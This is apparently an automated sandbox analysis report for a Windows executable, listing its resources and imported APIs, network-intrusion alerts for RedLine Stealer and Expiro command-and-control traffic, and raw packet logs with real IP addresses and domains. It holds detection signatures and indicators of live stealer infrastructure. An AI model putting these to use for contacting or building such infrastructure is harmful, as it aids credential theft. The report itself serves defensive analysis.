RT_ICON | 0xab538 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab660 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab788 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab8b0 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m | English | Great Britain | 0.010526082196644672
RT_ICON | 0xed8d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | English | Great Britain | 0.3820921985815603
RT_ICON | 0xedd40 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | English | Great Britain | 0.06628630705394191
RT_ICON | 0xf02e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | English | Great Britain | 0.1294559099437148
RT_ICON | 0xf1390 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | English | Great Britain | 0.01858807523955992
RT_ICON | 0x101bb8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | English | Great Britain | 0.042512990080302314
RT_MENU | 0x105de0 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0x105e30 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0x105f30 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0x106460 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0x106af0 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0x106f30 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0x107530 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0x107b90 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0x107f18 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0x108070 | 0x5a | data | English | Great Britain | 0.7666666666666667
RT_GROUP_ICON | 0x1080d0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1080e8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x108100 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x108118 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0x1082b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
                                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, 
GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll: SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll: DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll: DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll: SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-10T10:07:26.609785+0200 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 49707 | 18.141.10.107 | 80 | TCP
2024-10-10T10:07:27.497755+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:27.497755+0200 | 2046045 | ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:28.296964+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-10T10:07:28.296964+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-10T10:07:28.326326+0200 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 63299 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:28.978523+0200 | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 1 | 212.162.149.53 | 2049 | 192.168.2.5 | 49706 | TCP
2024-10-10T10:07:29.068154+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49713 | TCP
2024-10-10T10:07:29.068154+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 54.244.188.177 | 80 | 192.168.2.5 | 49713 | TCP
2024-10-10T10:07:29.544972+0200 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 63907 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:30.046321+0200 | 2051648 | ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) | 1 | 192.168.2.5 | 64943 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:31.577907+0200 | 2051649 | ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) | 1 | 192.168.2.5 | 54745 | 1.1.1.1 | 53 | UDP
2024-10-10T10:07:33.148215+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49724 | TCP
2024-10-10T10:07:33.148215+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.141.10.107 | 80 | 192.168.2.5 | 49724 | TCP
2024-10-10T10:07:34.043970+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:34.589789+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:34.594611+0200 | 2046056 | ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) | 1 | 212.162.149.53 | 2049 | 192.168.2.5 | 49706 | TCP
2024-10-10T10:07:35.130041+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:35.981709+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:36.844179+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:37.969534+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:40.570303+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:42.974911+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.311317+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.636681+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:46.811614+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:47.045742+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.178596+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.606672+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:48.611756+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:50.217086+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:51.539038+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:52.850906+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:55.012884+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:07:57.473457+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:00.032542+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:03.371412+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:05.405349+0200 | 2043231 | ET MALWARE Redline Stealer TCP CnC Activity | 1 | 192.168.2.5 | 49706 | 212.162.149.53 | 2049 | TCP
2024-10-10T10:08:06.325846+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49929 | TCP
2024-10-10T10:08:06.325846+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 47.129.31.212 | 80 | 192.168.2.5 | 49929 | TCP
2024-10-10T10:08:07.906644+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49942 | TCP
2024-10-10T10:08:07.906644+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 13.251.16.150 | 80 | 192.168.2.5 | 49942 | TCP
2024-10-10T10:08:13.663685+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.246.200.160 | 80 | 192.168.2.5 | 49985 | TCP
2024-10-10T10:08:13.663685+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.246.200.160 | 80 | 192.168.2.5 | 49985 | TCP
2024-10-10T10:08:14.476076+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 18.208.156.248 | 80 | 192.168.2.5 | 49992 | TCP
2024-10-10T10:08:14.476076+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 18.208.156.248 | 80 | 192.168.2.5 | 49992 | TCP
2024-10-10T10:08:22.918743+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.5 | 50017 | TCP
2024-10-10T10:08:22.918743+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.5 | 50017 | TCP
2024-10-10T10:08:28.098339+0200 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.5 | 50022 | 34.211.97.45 | 80 | TCP
2024-10-10T10:08:28.103171+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 34.211.97.45 | 80 | 192.168.2.5 | 50022 | TCP
2024-10-10T10:08:28.103171+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 34.211.97.45 | 80 | 192.168.2.5 | 50022 | TCP
2024-10-10T10:08:46.579278+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.254.94.185 | 80 | 192.168.2.5 | 50040 | TCP
2024-10-10T10:08:46.579278+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.254.94.185 | 80 | 192.168.2.5 | 50040 | TCP
2024-10-10T10:08:55.636463+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 35.164.78.200 | 80 | 192.168.2.5 | 50057 | TCP
2024-10-10T10:08:55.636463+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 35.164.78.200 | 80 | 192.168.2.5 | 50057 | TCP
2024-10-10T10:09:05.122422+0200 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.213.104.86 | 80 | 192.168.2.5 | 51583 | TCP
2024-10-10T10:09:05.122422+0200 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.213.104.86 | 80 | 192.168.2.5 | 51583 | TCP
2024-10-10T10:09:07.445163+0200 | 2051651 | ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) | 1 | 192.168.2.5 | 53567 | 1.1.1.1 | 53 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 10:07:23.668926001 CEST | 49704 | 443 | 192.168.2.5 | 104.26.12.205
Oct 10, 2024 10:07:23.668966055 CEST | 443 | 49704 | 104.26.12.205 | 192.168.2.5
Oct 10, 2024 10:07:23.669044018 CEST | 49704 | 443 | 192.168.2.5 | 104.26.12.205
Oct 10, 2024 10:07:23.672704935 CEST | 49704 | 443 | 192.168.2.5 | 104.26.12.205
Oct 10, 2024 10:07:23.672734976 CEST | 443 | 49704 | 104.26.12.205 | 192.168.2.5
Oct 10, 2024 10:07:23.726517916 CEST | 49705 | 80 | 192.168.2.5 | 54.244.188.177
Oct 10, 2024 10:07:23.731555939 CEST | 80 | 49705 | 54.244.188.177 | 192.168.2.5
Oct 10, 2024 10:07:23.731672049 CEST | 49705 | 80 | 192.168.2.5 | 54.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.741784096 CEST4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.741784096 CEST4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.746843100 CEST804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.746875048 CEST804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.166708946 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.166898012 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.172003031 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.172019005 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.172544003 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.229799032 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.275408983 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.360101938 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.360272884 CEST44349704104.26.12.205192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.360392094 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.417351961 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.471059084 CEST804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.471102953 CEST804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.471173048 CEST4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.770842075 CEST4970580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:24.775713921 CEST804970554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.084340096 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.089592934 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.089689016 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.102853060 CEST497062049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.107713938 CEST204949706212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.128240108 CEST4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.133155107 CEST804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.133233070 CEST4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.144601107 CEST4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.144620895 CEST4970780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.149521112 CEST804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.149552107 CEST804970718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.166965961 CEST4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.171899080 CEST804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.171977043 CEST4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.172862053 CEST4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.172878981 CEST4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.177762032 CEST804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.177791119 CEST804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.895824909 CEST804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.895904064 CEST804970854.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.895970106 CEST4970880192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:25.910326004 CEST4970880192.168.2.554.244.188.177
